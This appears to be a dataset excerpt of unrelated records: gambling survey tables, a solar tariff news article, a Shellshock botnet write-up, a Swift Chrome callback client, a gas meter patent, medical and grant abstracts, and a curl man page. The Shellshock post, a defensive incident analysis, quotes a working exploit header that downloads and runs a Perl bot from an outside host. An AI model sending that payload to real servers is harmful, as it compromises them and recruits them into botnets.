Total sample (*N* = 71) *n* (%) ------------------------------------------------------------------------------- ----------- In your opinion, excessive gambling in Swiss French-speaking area is    Not an issue 0 (0)  A minor issue 18 (25.4)  A major issue 41 (57.7)  A very major issue 3 (4.2)  I do not know 9 (12.7) Your interest in excessive gambling and gamblers\' indebtedness is    Important 11 (15.5)  Medium 38 (53.5)  Low 18 (25.4)  Null 2 (2.8)  I do not know 2 (2.8) Do you think gambling could become excessive or addictive    Total agreement 66 (93.0)  Partial agreement 4 (5.6)  Partial disagreement 0 (0)  Total disagreement 0 (0)  I do not know 1 (1.4) Do you think gambling could lead to indebtedness    Total agreement 69 (97.2)  Partial agreement 2 (2.8)  Partial disagreement 0 (0)  Total disagreement 0 (0)  I do not know 0 (0) Does excessive gambling worsen indebtedness in the current economical context    Total agreement 45 (63.4)  Partial agreement 18 (25.4)  Partial disagreement 2 (2.8)  Total disagreement 0 (0)  I do not know 5 (7.0)  Missing 1 (1.4) ###### Participants attitudes towards excessive gambling. Total sample (*N* = 71) *n* (%) ------------------------------------------------------------------------------------- ----------- Do you screen for excessive gambling    Systematically 0 (0)  Often 5 (7.0)  Rarely 25 (35.2)  Never 22 (31.1)  I do not know 1 (1.4)  Missing 18 (25.4) Do you screen for indebtedness    Systematically 1 (1.4)  Often 24 (33.8)  Rarely 24 (33.8)  Never 6 (8.5)  I do not know 2 (2.8)  Missing 14 (19.7) Your attitude towards excessive gambling is    I refer to specialist 37 (52.1)  I treat it 5 (7.0)  I do not do anything 2 (2.8)  I do not know 22 (31.8)  Missing 5 (7.0) Your attitude towards indebtedness is    I refer to specialist 34 (47.9)  I treat it 15 (21.1)  I do not do nothing 3 (4.2)  I do not know 7 (9.9)  Missing 12 (16.9) The best management of excessive gamblers is in referral to    Specialized multidisciplinary centers (doctors, psychologists, and social workers) 57 (80.3)  Private psychiatrists 2 (2.8)  General practitioners 3 (4.2)  Social services 1 (1.4)  Other 3 (4.2)  I do not know 2 (2.8)  Missing 3 (4.2) ###### Self-reported knowledge of problem gambling. Total sample (*N* = 71) *n* (%) -------------------------------------------------- ----------- My knowledge of problem gambling is    Very satisfying 0 (0)  Satisfying 12 (16.9)  Dissatisfying 46 (64.8)  Null 10 (14.1)  I do not know 0 (0)  Missing 3 (4.2) My knowledge of problem gambling care network is    Very satisfying 0 (0)  Satisfying 15 (21.1)  Dissatisfying 32 (45.1)  Null 18 (25.4)  I do not know 3 (4.2)  Missing 3 (4.2) I desire more information about problem gambling    Total agreement 39 (54.9)  Partial agreement 22 (31.0)  Partial disagreement 3 (4.2)  Total disagreement 2 (2.8)  I do not know 1 (1.4)  Missing 4 (5.6) I desire more training on problem gambling    Total agreement 19 (26.8)  Partial agreement 36 (50.7)  Partial disagreement 6 (8.5)  Total disagreement 3 (4.2)  I do not know 1 (1.4)  Missing 6 (8.5) ###### Screening for PrG in participants. 
Total sample (*N* = 71) *n* (%) -------------------------------------------------------------------------------- ----------- Have you ever felt the need to bet more and more money    Yes 1 (1.4)  No 67 (94.4)  I do not know 0 (0)  Missing 3 (4.2) Have you ever had to lie to people important to you about how much you gambled    Yes 0 (0)  No 68 (95.8)  I do not know 0 (0)  Missing 3 (4.2) [^1]: Academic Editor: Giovanni Martinotti
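For readers who want to reproduce this kind of analysis, the contingency-table tests named in the Methods section (Pearson chi-square on collapsed categories, Fisher's exact test for small 2×2 tables) can be sketched as below; the counts shown are hypothetical stand-ins for demonstration only, not the study's data.

```python
from scipy.stats import chi2_contingency, fisher_exact

# Hypothetical 2x2 table: rows = screening for PrG (often vs. rarely/never),
# columns = self-rated knowledge (satisfying vs. insufficient/none).
table = [[3, 2],
         [9, 38]]

# Pearson chi-square, used when expected-frequency requirements are met.
chi2, p_chi2, dof, expected = chi2_contingency(table)

# Fisher's exact test, preferred when expected cell counts are too small.
odds_ratio, p_fisher = fisher_exact(table)

print(f"chi-square p = {p_chi2:.3f}, Fisher exact p = {p_fisher:.3f}")
```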
null
minipile
NaturalLanguage
mit
null
Update: On January 22, 2018, President Trump approved a 30 percent tariff on imported solar panels, which will eventually decrease to 15 percent. Suniva was once among the top solar panel manufacturers in America. Then, in April, the Georgia company declared bankruptcy. A few days after, it revealed why: Foreign governments, like China, had subsidized competing solar cell manufacturers abroad, undercutting Suniva's prices. The company outlined its tale of woe in a petition filed that month with the US International Trade Commission calling for strong tariffs against foreign manufacturers. A few weeks later, another US manufacturer, Oregon's SolarWorld, joined the petition. And on Tuesday, August 15, the plaintiffs made their case to the ITC: Since 2012, foreign competition has cost the US solar industry 1,200 jobs and a 27 percent drop in wages. The tariff, they argued, would help create 115,000 to 144,000 jobs by 2022. View more But much of the rest of the US solar industry finds those figures far-fetched, and calls the tariff a terrible idea. See, manufacturing remains a small part of the US solar power industry. Most of the money—and work—lies in assembling panels into arrays and installing them for large corporate or industrial-scale clients (residential rooftop setups are small potatoes). Opponents of the tariff argue it would raise the material costs of generating solar electricity just as it is becoming cheap enough to compete with fossil fuels. Extend that logic, and the tariff threatens to curb an important contributor to the nascent clean energy boom. So no, this isn't your average trade dispute. Starting with the tariff's origin story. When Suniva filed for bankruptcy, it still had a chance to survive. But the company needed money to ride out the rough patch. One investor, the New York firm SQN Capital, offered $4 million credit ... if Suniva complained to the ITC about artificially cheap solar panels imported from abroad. On the surface, this sort of makes sense. SQN Capital had already sunk tens of millions into Suniva. If US panel manufacturing rebounded, the company could recoup some of its investment. But then there's the fact that SQN Capital wrote a letter to the Chinese Chamber of Commerce implying that $55 million would make the tariff request go away. More on that later. First, the tariff petition. It offers a two-pronged strategy to protect domestic solar panel manufacturing. The first part requests that any imported crystalline-silicon (one of several panel chemistries) solar panels see an added charge of 40 cents-per-watt. The second part sets a minimum price of 78 cents per watt for any imported panel. That might sound redundant, but it's meant to ensure that foreign subsidies don't make an end run around that 40 cent duty. The 78 cent price floor also effectively guarantees that domestic crystalline-silicon solar cells earn a healthy profit without having to worry about foreign competition. That's because, according to a Stanford University study, the average cost—which includes variable expenses like materials, labor, utilities, engineering, and administration—of making such a panel is below 40 cents per watt. Sure, other countries do it cheaper. Figuring out why is dicey. Do Chinese solar power manufacturers receive government subsidies? Of course. But so do US solar companies: SolarCity got $750 million from New York for its yet-to-open factory in Buffalo. 
“It comes down to the question of what does a thing cost a manufacturer to make, and what counts as product dumping,” says Stefan Reichelstein, faculty director of the Sustainable Energy Initiative​ at Stanford University and co-author of the study. Related Stories Green Energy Tesla Is Turning Kauai Into a Renewable Energy Paradise The power grid of the future will require sunny skies above and energy storage below. Thanks to Tesla, Kauai has both. energy Rooftop Solar Panels Are Great for the Planet—But Terrible for Firefighters New training and fire codes are supposed to make firefighters safer when they run into solar panels, but they're inconsistently applied. energy Three Ways to Bring Solar Power to the People Who Need It Most The cost of solar panels can put them out of reach for many families. But organizations are finding new ways to bring solar to low-income households. Good luck finding irrefutable evidence that the Chinese government unfairly subsidizes Chinese manufacturers. But even if that did happen, a tariff on their products wouldn't be a decisive economic coup. Manufacturing is not the backbone of the US solar industry. “When I finance a solar array, I am paying for not just the solar cells, but a lot of civil engineering, bulldozers, steel, and other additional resources. To do that, I have to outcompete not only solar projects, but other sources of generation,” says Colin Murchie, an expert in corporate and institutional-scale solar project planning for Sol Systems. You can credit those large-scale operations for most of recent solar energy demand. Last year, solar accounted for more than one-third of all newly installed electricity generation in the US. And solar's rising popularity is closely tied to its plummeting costs. Cut-rate panels from places like China are a big factor for those conjoined trends. Which is why a study by GreenTechMedia, a renewable energy news and analysis organization, reported that the proposed tariff would erase two-thirds of expected solar installations over the next five years. The Solar Energy Industries Association framed the tariff's effects in terms of jobs. Namely, kiss 88,000 of them goodbye. And yes, that would affect manufacturing, too. After GreenTechMedia published its study, Suniva and SolarWorld commissioned their own investigation of the tariff's effects. By correcting purported flaws in GreenTechMedia's methodology, the two companies say the tariff will create 115,000 to 144,000 US jobs in the next five years—44,000 of them in manufacturing alone. An ambitious figure, given the solar industry currently employs about 260,000 people (19 percent of whom work in manufacturing). Which study the ITC commission favors remains anyone's guess. But that's not all it has to chew on. Remember that letter from SQN Capital thing? Well, back in May, the president of SQN Capital—the company that lent Suniva $4 million and demanded it petition for tariff protections—wrote a letter to the Chinese Chamber of Commerce. It was unsubtle: Buy $55 million worth of Suniva's equipment, and SQN Capital would withdraw its money from Suniva, and the solar company would have to abandon its tariff request. Why $55 million? Well, that would allow SQN to recover the $51 or $52 million (including that $4 million loan) it sunk into Suniva over the years. Such an offer isn't against the law. But it does raise many questions about the motive behind the tariff petition. 
The rival sides saw each other in court on August 15—for 10 hours—and the ITC commission is set make its call in about a month. On one hand, the exorbitant duty request, overwhelming opposition from the US solar industry, and a possible shakedown seems like a serious tarnish on the tariff petition. On the other, a clean industry-crippling punishment for Chinese imports fits nicely within the federal government's "America First" energy plan. Nothing is certain, even on the sunniest days.
null
minipile
NaturalLanguage
mit
null
Anatomy of a Shellshock botnet Share Short URL Shellshock (aka Bashdoor) is a family of security vulnerabilities disclosed on September 24 that affected the very popular Bash shell. The first bug discovered, caused Bash to unintentionally execute commands when they were concatenated to the end of function definitions stored in the values of environment variables. Within days of the publication of this, intense scrutiny of the underlying design flaws discovered a variety of related vulnerabilities, which were addressed with a series of patches. (image by Aaron Kondziela under CC BY 4.0) Attackers exploited Shellshock within hours of the initial disclosure by creating botnets of compromised computers to perform distributed denial-of-service attacks and vulnerability scanning. Our business is server management and monitoring, so naturally we were bound to witness some of these attacks. Of course, our own servers were patched within hours of the announcement. That, however, didn’t stop people from launching the attacks. We take security very seriously and every exception that happens in Mist.io is documented and sent to our security team. On September 29, we started seeing several “HTTPNotFound: /cgi-bin/bash” exceptions and although our servers were patched, we decided to look into it and try to figure out what the attack plan was. This is what we were looking at: Sep 29 2014, 20:18 UTC HTTP GET (from 174.143.168.121) path_info: /cgi-bin/bash user_agent: () { :;}; /bin/bash -c "wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache" Naturally, our first step was to take a look at that legend.txt script. Well, it turns out it was a perl script used to scan for vulnerabilities and connect the compromised server to a command and control IRC server. Eventually, it tries to set up a SOCKS5 server (mocks) and if it succeeds, it sends the connection url via a private message in IRC. Next step was to connect to that IRC server. At the time, 272 infected servers were connected to the IRC #apache channel with nicks like APACHE-4366394. There were 3 admins online, one of them using the very unique and modest nickname “god”. We chased the IP addresses of the admins, but as expected that did not yield any significant results. The IRC server’s IP originated in a Slicehost pool, and soon enough, that server was going down. As the compromised servers were connected directly to the IRC server, we decided to collect their IP addresses, try to find their respective owners and inform them that their servers have been compromised. Being the only non-bot users on that IRC channel, the operator kept kicking and banning us. Well, kick banning did not work in the 90’s, it sure wasn’t going to work now. After collecting the infected IPs, we started doing reverse lookups. Fortunattely, none of the IPs seemed to be high-profile targets like Yahoo. In the end of the day, we informed the hosting companies and eventually got to some of the owners. At least our efforts did not go in vain. Overall, it seemed like a pretty standard type of attack that would have been prevented if the compromised servers had been properly patched. Keep in mind that it had already been five days since the disclosure of Shellshock and it was featured in all major news networks. Even if your server’s data are not important or it is a test server that you don’t care about, leaving it unpatched can make it part of a larger DDOS attack. 
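For administrators reviewing their own logs, a rough detection sketch for probes like the one above might look as follows; the log path, log format, and pattern coverage are assumptions, and real scanners match many more payload variants.

```python
import re

# The telltale Shellshock marker: a function definition "() {" smuggled into
# a header or environment variable, typically followed by extra commands.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:?;?\s*\}\s*;")

def suspicious_lines(log_path="access.log"):
    """Yield log lines whose User-Agent (or any other field) carries the marker."""
    with open(log_path, errors="replace") as log:
        for line in log:
            if SHELLSHOCK_RE.search(line):
                yield line.rstrip()

if __name__ == "__main__":
    for hit in suspicious_lines():
        print("possible Shellshock probe:", hit)
```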
Keeping your machines updated is crucial in fighting off the creation and expansion of malicious botnets. Do you have machines across clouds and want to easily manage them? Sign up for Mist.io and try it for free!
null
minipile
NaturalLanguage
mit
null
//
//  GoogleChrome
//  CallbackURLKit
/*
The MIT License (MIT)
Copyright (c) 2016 Eric Marchand (phimage)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
*/
//
import CallbackURLKit

// x-callback-url client for Google Chrome.
public class GoogleChrome: Client {

    public init() {
        super.init(urlScheme: "googlechrome-x-callback")
    }

    // Asks Chrome to open the given URL, optionally in a new tab.
    public func open(url: String, newTab: Bool = false, onSuccess: SuccessCallback? = nil, onFailure: FailureCallback? = nil, onCancel: CancelCallback? = nil) throws {
        var parameters = ["url": url]
        if newTab {
            // Add the create-new-tab flag without discarding the url parameter.
            parameters["create-new-tab"] = ""
        }
        try self.perform(action: "open", parameters: parameters, onSuccess: onSuccess, onFailure: onFailure, onCancel: onCancel)
    }
}
null
minipile
NaturalLanguage
mit
null
1. Field of the Invention This invention relates to an energy meter and a method of metering consumed energy. This invention is particularly applicable to the supply of energy in the form of fuel gas. 2. Discussion of the Background Conventionally energy consumption in the form of fuel gas is determined for billing purposes by measuring the volume of gas supplied to the consumer by providing a gas flow meter at the point of delivery. The gas supplier also remotely monitors the quality of gas supplied to a distribution area occupied by the consumer using the calorific value (CV) of the gas which is the fundamental measure of energy per unit volume, generally measured with a large and expensive chromatograph. From the CV of the gas supplied to the area together with the reading of the volume of fuel gas consumed by the customer, the gas supplier is able to determine the energy consumption from which the consumer is charged. As the customer is only able to determine the volume, of gas consumed without knowing the gas quality, he is unable to precisely monitor how much he will be charged. This is particularly disadvantageous for pre-payment xe2x80x9ccoin operatedxe2x80x9d gas meters. According to a first aspect of the present invention an energy meter comprises: means to measure a volume of gas supplied; means to measure a calorific value of the gas supplied; and means to calculate an energy value corresponding to the measured volume of gas supplied and the measured calorific value wherein both of the means to measure a volume of gas supplied and the means to measure a calorific value of the gas supplied are provided in a single integral meter unit. According to a second aspect of the present invention a method of determining a quantity of energy supplied to a consumer comprises: measuring a volume of gas supplied; measuring a calorific value of the gas supplied; and calculating an energy value of the supplied gas corresponding to the measured volume of gas supplied and the measured calorific value wherein both the measuring of a volume of gas supplied and the measuring of a calorific value of the gas supplied are performed at substantially the point of delivery to the consumer. The provision of an energy reading at the customer,s premises enables the consumer to monitor how much he will be charged. This is especially advantageous for pre-payment meters. According to a further aspect of the present invention an energy meter comprises: means to measure a volume of gas supplied; an apparatus to measure a calorific value of the gas including means to measure the speed of sound in the gas and means to use the speed of sound in an operation producing the calorific value of the gas corresponding to said speed of sound; and means to calculate an energy value corresponding to the measured volume of gas supplied and the measured calorific value. According to a still further aspect of the present invention a method of determining a quantity of energy supplied comprises: measuring a volume of gas supplied; measuring a calorific value of the gas supplied including measuring the speed of sound in the gas and using the speed of sound in an operation producing the calorific value of the gas corresponding to said speed of sound; and calculating an energy value of the supplied gas corresponding to the measured volume of gas supplied and the measured calorific value. 
The means to measure a volume of gas supplied and the apparatus to measure the calorific value of the gas are preferably provided in a single unit. The means to calculate an energy value may also be provided in the same unit but may additionally or alternatively be provided remotely, for example at the gas supplier""s billing department. Since the speed of sound of a gas can be determined by a conveniently compact and inexpensive device it can be provided in a small meter unit and provided with correspondingly compact means, preferably in the form of control electronics or a processing means, to produce the calorific value from the measured speed of sound. Such an apparatus to measure a calorific value of the gas is much smaller, cheaper and easier to operate than a conventional calorific value measuring device such as a chromatograph. Consequently, this enables the production of a meter to measure energy which is small, cheap and reliable when used with a means to measure a volume of gas supplied. The calorific value of a gas is preferably measured by making a measure of a first thermal conductivity of the gas at a first temperature, making a measure of a second thermal conductivity of the gas at a second temperature which differs from the first temperature, and using the speed of sound and the first and second thermal conductivities in an operation producing the calorific value of the gas corresponding to said speed of sound and said first and second thermal conductivities. The above described meter and method are suitable for both domestic and industrial use. All references to the calorific value include parameters equivalent to calorific value such as Wobbe Index x{square root over (RD)}. All references to calorific value also include parameters dependent upon calorific value which when considered with the volume of gas supplied produce a parameter dependent upon the energy value. All references to energy value include parameters dependent upon energy values such as cost in the local currency. The cost is determined by multiplying the consumed energy, measured in Joules or Watt hours for example, by the cost per unit of energy.
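As a rough illustration of the billing arithmetic described above (energy as the product of delivered volume and calorific value, cost as energy times a unit price), a minimal sketch follows; all figures are invented, and the conversion assumes the calorific value is expressed per unit volume.

```python
# Hypothetical meter readings and tariff - illustrative values only.
volume_m3 = 120.0                   # gas volume delivered over the billing period
calorific_value_mj_per_m3 = 39.5    # measured CV of the gas supplied
price_per_kwh = 0.07                # local currency per kilowatt-hour of energy

energy_mj = volume_m3 * calorific_value_mj_per_m3   # energy in megajoules
energy_kwh = energy_mj / 3.6                        # 1 kWh = 3.6 MJ

cost = energy_kwh * price_per_kwh
print(f"Energy supplied: {energy_kwh:.1f} kWh, charge: {cost:.2f}")
```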
null
minipile
NaturalLanguage
mit
null
Over-expression of heat shock proteins in carcinogenic endometrium. We have previously shown that the subcellular localization of beta-catenin changes according to the cell proliferation status of the human endometrium, suggesting a role of intercellular transduction in cell growth control in human endometrium not only in the physiological but also in the carcinogenic condition. To further study the possible role of heat shock proteins (HSPs) in growth control, we immunohistochemically analyzed 92 endometrial samples, 30 of normal endometrium, 20 of endometrial hyperplasia and 42 of endometrial cancer, for expression of HSP27, HSP70, HSP90, estrogen receptor (ER) and progesterone receptor. HSP27 and HSP90 were detected in endometrial epithelium strongly in the proliferative phase and weakly in the secretory phase during the menstrual cycle according to the serum estradiol level. However, they were over-expressed in endometrial hyperplasia, especially HSP27. In endometrial cancer, HSP27 expression was heterogenic among the glands and lower than that in the proliferative phase and endometrial hyperplasia. HSP27 over-expression was also observed in samples including endometrial cancer and associated hyperplasia. Results of Western blotting followed those of immunohistochemistry. HSP70 was not changed during the menstrual cycle, as HSP27 and HSP90 were, and was rather stably expressed in endometrial hyperplasia and cancer. Our results suggest that HSP27 and HSP90 contribute to cell proliferation in endometrial epithelium and that over-expression of HSP27 in endometrial hyperplasia occurs as a result of the activated condition of ER, though in cancer it decreases according to the loss of function of ER.
null
minipile
NaturalLanguage
mit
null
Over two decades of research has demonstrated that family caregivers are at elevated risk of a number of negative outcomes, including psychological distress, physical illness, and economic strain, and, in turn, of disruptions in social relationships. Social support interventions have been seen as a primary response to preventing, postponing, or reversing these negative sequelae of caregiving. Despite this potential, there is a paucity of rigorous evaluation research on such interventions. The proposed project will evaluate different modes of delivering social support interventions for family caregivers to relatives with Alzheimer's disease (AD) or other irreversible dementia. The project is grounded in theory and empirical research on status transitions and their impact on interpersonal relationships. This literature suggests that increasing the number of social network members who have undergone the same stressful situation (in this case, caring for an elderly relative) will lead to increased well-being among caregivers. The study will advance knowledge in this area by employing a) a strong theoretical grounding for the intervention; b) a randomized control-group design; c) reliable and valid outcome measures that are closely related to the goals of the intervention; d) a descriptive process component; and e) longitudinal follow-up. The project will be conducted in close collaboration with practitioners, and results will be widely disseminated. This design will allow exploration of the following research questions: 1. Does increasing the number of caregivers in an individual's network lead to positive outcomes? 2. Does the effectiveness of the program differ according to whether it is delivered in a group or dyadic setting? 3. Is the effectiveness of this intervention related to the structure of the individual's preexisting social network? 4. Is the effectiveness of this intervention affected by the degree of stress of the caregiving situation? 5. Does the effectiveness of the intervention differ in rural and nonrural settings?
null
minipile
NaturalLanguage
mit
null
.\" ************************************************************************** .\" * _ _ ____ _ .\" * Project ___| | | | _ \| | .\" * / __| | | | |_) | | .\" * | (__| |_| | _ <| |___ .\" * \___|\___/|_| \_\_____| .\" * .\" * Copyright (C) 1998 - 2015, Daniel Stenberg, <[email protected]>, et al. .\" * .\" * This software is licensed as described in the file COPYING, which .\" * you should have received as part of this distribution. The terms .\" * are also available at https://curl.haxx.se/docs/copyright.html. .\" * .\" * You may opt to use, copy, modify, merge, publish, distribute and/or sell .\" * copies of the Software, and permit persons to whom the Software is .\" * furnished to do so, under the terms of the COPYING file. .\" * .\" * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY .\" * KIND, either express or implied. .\" * .\" ************************************************************************** .\" .TH CURLINFO_APPCONNECT_TIME 3 "28 Aug 2015" "libcurl 7.44.0" "curl_easy_getinfo options" .SH NAME CURLINFO_APPCONNECT_TIME \- get the time until the SSL/SSH handshake is completed .SH SYNOPSIS #include <curl/curl.h> CURLcode curl_easy_getinfo(CURL *handle, CURLINFO_APPCONNECT_TIME, double *timep); .SH DESCRIPTION Pass a pointer to a double to receive the time, in seconds, it took from the start until the SSL/SSH connect/handshake to the remote host was completed. This time is most often very near to the \fICURLINFO_PRETRANSFER_TIME(3)\fP time, except for cases such as HTTP pipelining where the pretransfer time can be delayed due to waits in line for the pipeline and more. See also the TIMES overview in the \fIcurl_easy_getinfo(3)\fP man page. .SH PROTOCOLS All .SH EXAMPLE TODO .SH AVAILABILITY Added in 7.19.0 .SH RETURN VALUE Returns CURLE_OK if the option is supported, and CURLE_UNKNOWN_OPTION if not. .SH "SEE ALSO" .BR curl_easy_getinfo "(3), " curl_easy_setopt "(3), "
null
minipile
NaturalLanguage
mit
null
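The man page in the preceding row leaves its EXAMPLE section as TODO. Below is a minimal sketch of what that section could contain, following the usual libcurl pattern: perform a transfer, then read CURLINFO_APPCONNECT_TIME once it completes. The URL is a placeholder; any TLS- or SSH-based URL would exercise the handshake being timed.

#include <stdio.h>
#include <curl/curl.h>

int main(void)
{
  CURL *curl = curl_easy_init();
  if(curl) {
    double appconnect;
    CURLcode res;

    /* placeholder URL for illustration */
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");

    res = curl_easy_perform(curl);
    if(res == CURLE_OK) {
      /* seconds from start until the SSL/SSH handshake completed */
      res = curl_easy_getinfo(curl, CURLINFO_APPCONNECT_TIME, &appconnect);
      if(res == CURLE_OK)
        printf("SSL/SSH handshake done after %.3f seconds\n", appconnect);
    }
    curl_easy_cleanup(curl);
  }
  return 0;
}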